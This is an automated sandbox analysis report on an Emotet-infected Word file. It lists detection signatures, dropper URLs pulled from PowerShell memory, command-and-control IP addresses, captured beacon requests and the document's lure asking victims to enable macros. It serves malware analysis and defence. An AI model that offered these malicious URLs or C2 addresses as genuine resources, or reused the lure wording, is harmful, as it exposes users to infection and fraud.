Analysis Report Informacion_4-09757.doc

Overview

General Information

Sample Name: Informacion_4-09757.doc
Analysis ID: 336961
MD5: 4adc5e8e53a40fd14ff90e99e94e39cb
SHA1: 406d00f10a2298acfe192fb85e870d5e5d094263
SHA256: 1c29c870c5c27cec2f22790ecc87e0c1c1ae59bd4e5c8204ec9182524d68d68f

Most interesting Screenshot:

Detection

Emotet
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected Emotet
Creates processes via WMI
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Encrypted powershell cmdline option found
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Potential dropper URLs found in powershell memory
PowerShell case anomaly found
Powershell drops PE file
Sigma detected: Suspicious Encoded PowerShell Command Line
Suspicious powershell command line found
Very long command line found
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found evasive API chain (may stop execution after checking a module file name)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

AV Detection:

barindex
Antivirus detection for URL or domain
Source: https://goldilockstraining.com/wp-includes/bftt/ Avira URL Cloud: Label: malware
Source: http://biglaughs.org/smallpotatoes/rRwRzc/ Avira URL Cloud: Label: malware
Source: http://paulscomputing.com/CraigsMagicSquare/H/ Avira URL Cloud: Label: malware
Source: http://goldcoastoffice365.com/temp/X/ Avira URL Cloud: Label: phishing
Source: http://goldcoastoffice365.com/temp/X/P Avira URL Cloud: Label: phishing
Source: http://azraktours.com/wp-content/NWF9jC/ Avira URL Cloud: Label: malware
Source: http://josegene.com/theme/gU8/ Avira URL Cloud: Label: malware
Source: https://jeffdahlke.com/css/bg4n3/ Avira URL Cloud: Label: malware
Multi AV Scanner detection for dropped file
Source: C:\Users\user\Bqpeen6\Bbs5w_e\Yvtlx6p4.dll ReversingLabs: Detection: 89%
Multi AV Scanner detection for submitted file
Source: Informacion_4-09757.doc Metadefender: Detection: 36% Perma Link
Source: Informacion_4-09757.doc ReversingLabs: Detection: 75%
Machine Learning detection for dropped file
Source: C:\Users\user\Bqpeen6\Bbs5w_e\Yvtlx6p4.dll Joe Sandbox ML: detected
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2096764836.0000000002B97000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2096764836.0000000002B97000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2096764836.0000000002B97000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2096764836.0000000002B97000.00000004.00000040.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2096764836.0000000002B97000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2096764836.0000000002B97000.00000004.00000040.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2101464007.000000001B3D0000.00000002.00000001.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior

Software Vulnerabilities:

barindex
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: paulscomputing.com
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 167.71.148.58:443
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 216.218.207.98:80

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2404314 ET CNC Feodo Tracker Reported CnC Server TCP group 8 192.168.2.22:49168 -> 184.66.18.83:80
Potential dropper URLs found in powershell memory
Source: powershell.exe, 00000005.00000002.2100488741.0000000003972000.00000004.00000001.sdmp String found in memory: http://biglaughs.org/smallpotatoes/rRwRzc/
Source: powershell.exe, 00000005.00000002.2100488741.0000000003972000.00000004.00000001.sdmp String found in memory: http://josegene.com/theme/gU8/
Source: powershell.exe, 00000005.00000002.2100488741.0000000003972000.00000004.00000001.sdmp String found in memory: http://paulscomputing.com/CraigsMagicSquare/H/
Source: powershell.exe, 00000005.00000002.2100488741.0000000003972000.00000004.00000001.sdmp String found in memory: https://goldilockstraining.com/wp-includes/bftt/
Source: powershell.exe, 00000005.00000002.2100488741.0000000003972000.00000004.00000001.sdmp String found in memory: https://jeffdahlke.com/css/bg4n3/
Source: powershell.exe, 00000005.00000002.2100488741.0000000003972000.00000004.00000001.sdmp String found in memory: http://azraktours.com/wp-content/NWF9jC/
Source: powershell.exe, 00000005.00000002.2100488741.0000000003972000.00000004.00000001.sdmp String found in memory: http://goldcoastoffice365.com/temp/X/
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /CraigsMagicSquare/H/ HTTP/1.1Host: paulscomputing.comConnection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 167.71.148.58 167.71.148.58
Source: Joe Sandbox View IP Address: 202.187.222.40 202.187.222.40
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
Source: Joe Sandbox View ASN Name: TTNET-MYTIMEdotComBerhadMY TTNET-MYTIMEdotComBerhadMY
Source: Joe Sandbox View ASN Name: SHAWCA SHAWCA
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /ta2men4jqfnerm/ HTTP/1.1DNT: 0Referer: 167.71.148.58/ta2men4jqfnerm/Content-Type: multipart/form-data; boundary=------------------NYbEqHIaKH4WS2W1IvUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 167.71.148.58:443Content-Length: 7684Connection: Keep-AliveCache-Control: no-cache
Source: unknown TCP traffic detected without corresponding DNS query: 184.66.18.83
Source: unknown TCP traffic detected without corresponding DNS query: 184.66.18.83
Source: unknown TCP traffic detected without corresponding DNS query: 202.187.222.40
Source: unknown TCP traffic detected without corresponding DNS query: 202.187.222.40
Source: unknown TCP traffic detected without corresponding DNS query: 202.187.222.40
Source: unknown TCP traffic detected without corresponding DNS query: 202.187.222.40
Source: unknown TCP traffic detected without corresponding DNS query: 202.187.222.40
Source: unknown TCP traffic detected without corresponding DNS query: 202.187.222.40
Source: unknown TCP traffic detected without corresponding DNS query: 167.71.148.58
Source: unknown TCP traffic detected without corresponding DNS query: 167.71.148.58
Source: unknown TCP traffic detected without corresponding DNS query: 167.71.148.58
Source: unknown TCP traffic detected without corresponding DNS query: 167.71.148.58
Source: unknown TCP traffic detected without corresponding DNS query: 167.71.148.58
Source: unknown TCP traffic detected without corresponding DNS query: 167.71.148.58
Source: unknown TCP traffic detected without corresponding DNS query: 167.71.148.58
Source: unknown TCP traffic detected without corresponding DNS query: 167.71.148.58
Source: unknown TCP traffic detected without corresponding DNS query: 167.71.148.58
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{B4F87BA3-97C0-4A14-814E-1968BCE52029}.tmp Jump to behavior
Source: global traffic HTTP traffic detected: GET /CraigsMagicSquare/H/ HTTP/1.1Host: paulscomputing.comConnection: Keep-Alive
Source: rundll32.exe, 00000006.00000002.2102053701.0000000001AE0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2099969121.0000000001F00000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2100149332.0000000001D70000.00000002.00000001.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknown DNS traffic detected: queries for: paulscomputing.com
Source: unknown HTTP traffic detected: POST /ta2men4jqfnerm/ HTTP/1.1DNT: 0Referer: 167.71.148.58/ta2men4jqfnerm/Content-Type: multipart/form-data; boundary=------------------NYbEqHIaKH4WS2W1IvUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 167.71.148.58:443Content-Length: 7684Connection: Keep-AliveCache-Control: no-cache
Source: powershell.exe, 00000005.00000002.2100488741.0000000003972000.00000004.00000001.sdmp String found in binary or memory: http://azraktours.com/wp-content/NWF9jC/
Source: powershell.exe, 00000005.00000002.2100488741.0000000003972000.00000004.00000001.sdmp String found in binary or memory: http://biglaughs.org/smallpotatoes/rRwRzc/
Source: powershell.exe, 00000005.00000002.2100488741.0000000003972000.00000004.00000001.sdmp String found in binary or memory: http://goldcoastoffice365.com/temp/X/
Source: powershell.exe, 00000005.00000002.2096848822.0000000002C06000.00000004.00000001.sdmp String found in binary or memory: http://goldcoastoffice365.com/temp/X/P
Source: rundll32.exe, 00000006.00000002.2102053701.0000000001AE0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2099969121.0000000001F00000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2100149332.0000000001D70000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000006.00000002.2102053701.0000000001AE0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2099969121.0000000001F00000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2100149332.0000000001D70000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com/
Source: powershell.exe, 00000005.00000002.2100488741.0000000003972000.00000004.00000001.sdmp String found in binary or memory: http://josegene.com/theme/gU8/
Source: rundll32.exe, 00000006.00000002.2103730414.0000000001CC7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2100245452.00000000020E7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2100381220.0000000001F57000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000006.00000002.2103730414.0000000001CC7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2100245452.00000000020E7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2100381220.0000000001F57000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: powershell.exe, 00000005.00000002.2100658698.0000000003B1A000.00000004.00000001.sdmp String found in binary or memory: http://paulscomputing.com
Source: powershell.exe, 00000005.00000002.2100488741.0000000003972000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2101714623.000000001B551000.00000004.00000001.sdmp String found in binary or memory: http://paulscomputing.com/CraigsMagicSquare/H/
Source: powershell.exe, 00000005.00000002.2096036596.00000000022B0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2100891338.0000000002800000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2101517082.00000000027F0000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: rundll32.exe, 00000006.00000002.2103730414.0000000001CC7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2100245452.00000000020E7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2100381220.0000000001F57000.00000002.00000001.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: rundll32.exe, 00000006.00000002.2103730414.0000000001CC7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2100245452.00000000020E7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2100381220.0000000001F57000.00000002.00000001.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: powershell.exe, 00000005.00000002.2096036596.00000000022B0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2100891338.0000000002800000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2101517082.00000000027F0000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2104721248.0000000002830000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA
Source: rundll32.exe, 00000006.00000002.2102053701.0000000001AE0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2099969121.0000000001F00000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2100149332.0000000001D70000.00000002.00000001.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000006.00000002.2103730414.0000000001CC7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2100245452.00000000020E7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2100381220.0000000001F57000.00000002.00000001.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: rundll32.exe, 00000006.00000002.2102053701.0000000001AE0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2099969121.0000000001F00000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2100149332.0000000001D70000.00000002.00000001.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: powershell.exe, 00000005.00000002.2095353047.0000000000337000.00000004.00000020.sdmp String found in binary or memory: http://www.piriform.com/ccleaner
Source: powershell.exe, 00000005.00000002.2095369580.0000000000367000.00000004.00000020.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: powershell.exe, 00000005.00000002.2095353047.0000000000337000.00000004.00000020.sdmp String found in binary or memory: http://www.piriform.com/ccleanerv
Source: rundll32.exe, 00000008.00000002.2100149332.0000000001D70000.00000002.00000001.sdmp String found in binary or memory: http://www.windows.com/pctv.
Source: powershell.exe, 00000005.00000002.2100488741.0000000003972000.00000004.00000001.sdmp String found in binary or memory: https://goldilockstraining.com/wp-includes/bftt/
Source: powershell.exe, 00000005.00000002.2100488741.0000000003972000.00000004.00000001.sdmp String found in binary or memory: https://jeffdahlke.com/css/bg4n3/
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49171
Source: unknown Network traffic detected: HTTP traffic on port 49171 -> 443

E-Banking Fraud:

barindex
Yara detected Emotet
Source: Yara match File source: 0000000B.00000002.2104461658.0000000000251000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2097868806.0000000000201000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2102162180.0000000000190000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2100838145.0000000000180000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2104434238.0000000000200000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2107224679.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2109356030.00000000001E1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2097792177.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2102227386.00000000001B1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2346608733.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2105642639.0000000000201000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2107394819.0000000000211000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2105597676.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2110979114.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2109268872.0000000000140000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2346635029.00000000001F1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2099576537.0000000000220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2100056068.0000000000701000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2100874845.00000000001A1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2111023949.00000000001F1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 14.2.rundll32.exe.1e0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.1a0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.180000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.190000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.220000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.1e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.1e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.180000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.1f0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.220000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.190000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.1f0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.1b0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.140000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.250000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.200000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.200000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.700000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.140000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.200000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.200000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 0 Page: I o' ' Wo'd"
Source: Screenshot number: 4 Screenshot OCR: DOCUMENT IS PROTECTED. I Previewing is not available for protected documents. You have to press "E
Source: Screenshot number: 4 Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Screenshot number: 4 Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 0 Page: I o' ' Wo'd" N@m 13 ;a 10096 G) FI
Source: Screenshot number: 8 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. K . . . . O a S
Source: Screenshot number: 8 Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Screenshot number: 8 Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Screenshot number: 8 Screenshot OCR: ENABLE CONTENT" buttons to preview this document. K . . . . O a S
Source: Document image extraction number: 0 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 0 Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 0 Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1 Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Document image extraction number: 1 Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 1 Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Powershell drops PE file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Bqpeen6\Bbs5w_e\Yvtlx6p4.dll Jump to dropped file
Very long command line found
Source: unknown Process created: Commandline size = 7696
Source: unknown Process created: Commandline size = 7605
Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 7605 Jump to behavior
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write
Creates files inside the system directory
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\SysWOW64\Ocet\ Jump to behavior
Detected potential crypto function
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000D270 7_2_1000D270
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10011EA7 7_2_10011EA7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10012750 7_2_10012750
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10012B5C 7_2_10012B5C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001237C 7_2_1001237C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10012F7C 7_2_10012F7C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001E6005 7_2_001E6005
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001E3C28 7_2_001E3C28
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001E7C4A 7_2_001E7C4A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001EC44B 7_2_001EC44B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001F1079 7_2_001F1079
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001EE871 7_2_001EE871
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001F0065 7_2_001F0065
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001F4460 7_2_001F4460
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001EE499 7_2_001EE499
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001F9494 7_2_001F9494
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001FC48F 7_2_001FC48F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001EBCA5 7_2_001EBCA5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001F5CCB 7_2_001F5CCB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001EA4E1 7_2_001EA4E1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001F1913 7_2_001F1913
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001E510E 7_2_001E510E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001F5136 7_2_001F5136
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001E6D2C 7_2_001E6D2C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001EDD24 7_2_001EDD24
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001E3521 7_2_001E3521
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001FBD5E 7_2_001FBD5E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001E415F 7_2_001E415F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001F7D78 7_2_001F7D78
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001FA59F 7_2_001FA59F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001FB59B 7_2_001FB59B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001E7D94 7_2_001E7D94
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001E4DB8 7_2_001E4DB8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001F41AD 7_2_001F41AD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001E75A0 7_2_001E75A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001F2DE1 7_2_001F2DE1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001E2A18 7_2_001E2A18
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001E0A00 7_2_001E0A00
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001F2A00 7_2_001F2A00
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00201600 7_2_00201600
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001F6E50 7_2_001F6E50
